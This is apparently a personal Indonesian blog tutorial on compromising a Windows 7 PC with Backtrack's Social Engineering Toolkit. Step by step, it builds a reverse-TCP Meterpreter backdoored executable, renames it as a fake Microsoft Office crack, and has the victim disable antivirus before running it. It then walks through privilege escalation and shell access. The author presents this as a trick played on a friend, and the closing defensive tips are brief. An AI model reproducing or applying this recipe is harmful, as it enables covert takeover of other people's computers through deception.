Distro linux sangat banyak dan variatif, sehingga kita dapat menggunakannya sesuai dengan kebutuhan kita. Seperti saya, suka dengan dunia hacking, maka saya menggunakan distro Backtrack. Pada kesempatan kali ini saya akan membagi pengalaman saya pertama kali melakukan aksi hacking menggunakan distro ini. Tutorial yang saya buat bisa sangat berbahaya, jadi harap digunakan secara bijak dan hanya untuk pembelajaran saja.

Sistem Operasi yang digunakan: Backtrack 5 R1

Sistem Operasi Target: Windows 7 Professional

Saat itu, saya lagi berkumpul bersama teman-teman di kampus, kami berinternetan di lokasi hotspot kampus. Lalu salah satu teman saya meminta sebuah crack-an software microsoft office 2010. Kemudian saya berfikir untuk membuat payload yang di binder dengan crack-an ms.office tersebut. Karena saya belum banyak mengenal linux, maka saya tidak bisa membuatnya dan membuat dengan memberikan 1 aplikasi crack-an dan 1 payload.

Berikut percakapan kami

Teman: Lu punya crack-an ms.office nggak?
Saya: Ada nih, kirim via USB aja ya. Ada 2 file nih nggak tau yang mana yang bisa, coba aja dua-duanya.
Teman: iya
Saya: Matiin antivirusnya, soalnya ke detect virus nih crackannya.
Teman: Ok

Kira-kira seperti itu percakapan kami. Saya akan implementasikan menggunakan peralatan sendiri, 2 laptop dan 1 modem wireless. Berikut adalah tutorial pembuatan payloadnya.

Buka terminal (Ctrl+Alt+T), masuk ke direktori /pentest/exploits/set
cd /pentest/exploits/set

Lalu untuk menjalankan program Social Engineering Toolkit, ketikkan
./set

Pilih nomor 1 (Social Enginering Attacks) lalu pilih 4 (Create a Payload and Listener). Kita akan membuat sebuah payload dan listenernya.

Langkah selanjutnya adalah menentukan apa yang akan kita dapatkan jika korban meng-klik payload yang akan kita buat. Kita pilih nomor 2 (Windows Reverse_TCP Meterpreter).

Selanjutnya pilih nomor 16 Backdoored Executable (BEST)  dan masukkan port 443. Saya menggunakan port 443 karena port ini selalu terbuka.

Lalu saat muncul pertanyaan Start the listener now? Ketikkan yes dan listener berjalan menunggu korban meng-klik exploit yang baru kita buat.

Exploit yang barusan kita buat akan di simpan di dalam direktori /pentest/exploit/set. Buka terminal baru (Ctrl+Alt+T), lalu menuju direktori /pentest/exploits/setdan ketikkan ls, maka akan terlihat exploit yang telah kita buat, bernama msf.exe.

Agar korban tidak curiga, sebaiknya kita rename exloitnya. Saya rubah msf.exe menjadi crack1.exe dengan perintah sebagai berikut:
mv msf.exe crack1.exe

Selesai, sekarang copy crack1.exe kedalam sebuah flashdisk, dan berikan ke korban.

Jika koran sudah mengeksekusi exploit kita, kita lihat terminal listener kita. Maka akan terlihat seperti gambar berikut:

1 sesi meterpreter terbuka dengan IP Address Attacker (kita): 192.168.1.9 mengakses di port 443 dan IP Address korban 192.168.1.3 di akses melalui port 49179. Dan ketikkan:
sessions -i 1

Lalu ketikkan:
ps

ps adalah sebuah perintah untuk menampilkan proses-proses yang sedang berjalan.

Kita cari proses explorer.exe, dan ditemukan PID-nya 716. Sekarang ketikkan:
migrate 716

miggrate adalah sebuah command untuk pindah/menuju ke suatu proses.

Lalu ketikkan:
getsystem

getsystem adalah perintah untuk mendapatkan system yang sedang berjalan.

Selanjutnya ketikkan
getuid

getuid adalah sebuah perintah untuk menampilkan user pada sebuah host.

Dan untuk mendapatkan interface dari komputer korban, kita dapat mengetikkan:

shell

Bingo.. Kita telah berhasil masuk ke dalam komputer korban. Untuk perintah-perintah meterpreter, anda dapat mengetkikkan help dan akan tampil perintah-perintah apa saja yang dapat digunakan. Hal ini tentu sangat berbahaya, kita dapat menanam keylogger, mengirim virus, men-capture desktop, sampai mengubah struktur system. Jadi harap tutorial ini digunakan sebagai pembelajaran, bukan untuk kejahatan.

Penanggulangan:

  • Install antivirus dan update selalu
  • Jika muncul alert, maka baca dengan hati-hati.
  • Aktifkan selalu Firewall.

Berikut, saya attach video agar lebih jelas: Hack Windows 7 with SAT

Mungkin hanya itu saja yang dapat saya berikan dari pengalaman menyenangkan, semoga bermanfaat.

Blog pribadi: http://adhie70.ugcode.com